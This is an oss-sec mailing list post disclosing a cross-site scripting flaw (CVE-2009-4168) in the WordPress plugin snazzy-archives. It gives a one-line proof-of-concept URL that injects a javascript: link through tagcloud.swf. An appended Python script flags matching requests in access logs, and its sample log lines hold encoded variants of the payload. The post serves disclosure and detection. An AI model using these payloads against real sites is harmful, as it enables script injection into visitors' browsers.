oss-sec mailing list archives

CVE-2009-4168: WordPress plugin snazzy-archives XSS vulnerability


From: Henri Salo <henri () nerv fi>
Date: Sun, 10 Mar 2013 11:47:37 +0200

Plugin URL: http://wordpress.org/extend/plugins/snazzy-archives/
Versions affected: 1.7.1 and below
Reported to WordPress plugins team: 2013-02-03
Status: Plugin currently disabled by WordPress plugins team. Not fixed by plugin maintainer.

PoC: 
wp-content/plugins/snazzy-archives/i/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href=%27javascript:alert%28%22oss-security%20is%20great!%22%29%27+style=%27font-size:+40pt%27%3Efree%20pr0n%3C/a%3E%3C/tags%3E

--
Henri Salo
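
A log check for requests shaped like the PoC above, added here as an example and not part of the original post. It assumes a combined-format web server access log; the function names, verdict labels and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

SWF_SUFFIX = "/snazzy-archives/i/tagcloud.swf"  # path taken from the PoC
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# An href attribute whose value starts with a scriptable URL scheme.
SCRIPT_HREF = re.compile(r"href\s*=\s*['\"]?\s*(?:javascript|vbscript|data)\s*:", re.I)

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding and drop tab/CR/LF, which browsers ignore in URLs."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return re.sub(r"[\t\r\n]", "", value)

def classify(log_line):
    """Return 'script-href', 'tagcloud-param' or None for one access log line."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not fully_decode(url.path).lower().endswith(SWF_SUFFIX):
        return None
    values = parse_qs(url.query, keep_blank_values=True).get("tagcloud", [])
    if not values:
        return None
    if any(SCRIPT_HREF.search(fully_decode(v)) for v in values):
        return "script-href"      # markup with a scriptable link was supplied
    return "tagcloud-param"       # markup supplied via the URL; worth a review

# Constructed sample log lines (not taken from any real server).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Mar/2013:11:50:02 +0200] "GET /wp-content/plugins/snazzy-archives/i/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href=%27javascript:void(0)%27%3Ex%3C/a%3E%3C/tags%3E HTTP/1.1" 200 512',
    '198.51.100.7 - - [10/Mar/2013:11:50:09 +0200] "GET /wp-content/plugins/snazzy-archives/i/tagcloud.swf?mode=tags&tagcloud=%253Ca%2Bhref%253D%2527javascript%253Avoid(0)%2527%253E HTTP/1.1" 200 512',
    '203.0.113.4 - - [10/Mar/2013:11:51:30 +0200] "GET /wp-content/plugins/snazzy-archives/i/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href=%27http://example.org/tag/a%27%3Ea%3C/a%3E%3C/tags%3E HTTP/1.1" 200 512',
    '203.0.113.4 - - [10/Mar/2013:11:52:00 +0200] "GET /index.php HTTP/1.1" 200 4096',
]

def scan(lines):
    """Return (line number, verdict) for every line that classify() flags."""
    return [(n, v) for n, line in enumerate(lines, 1) if (v := classify(line))]

if __name__ == "__main__":
    for n, verdict in scan(SAMPLE_LOG):
        print(n, verdict)
```
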
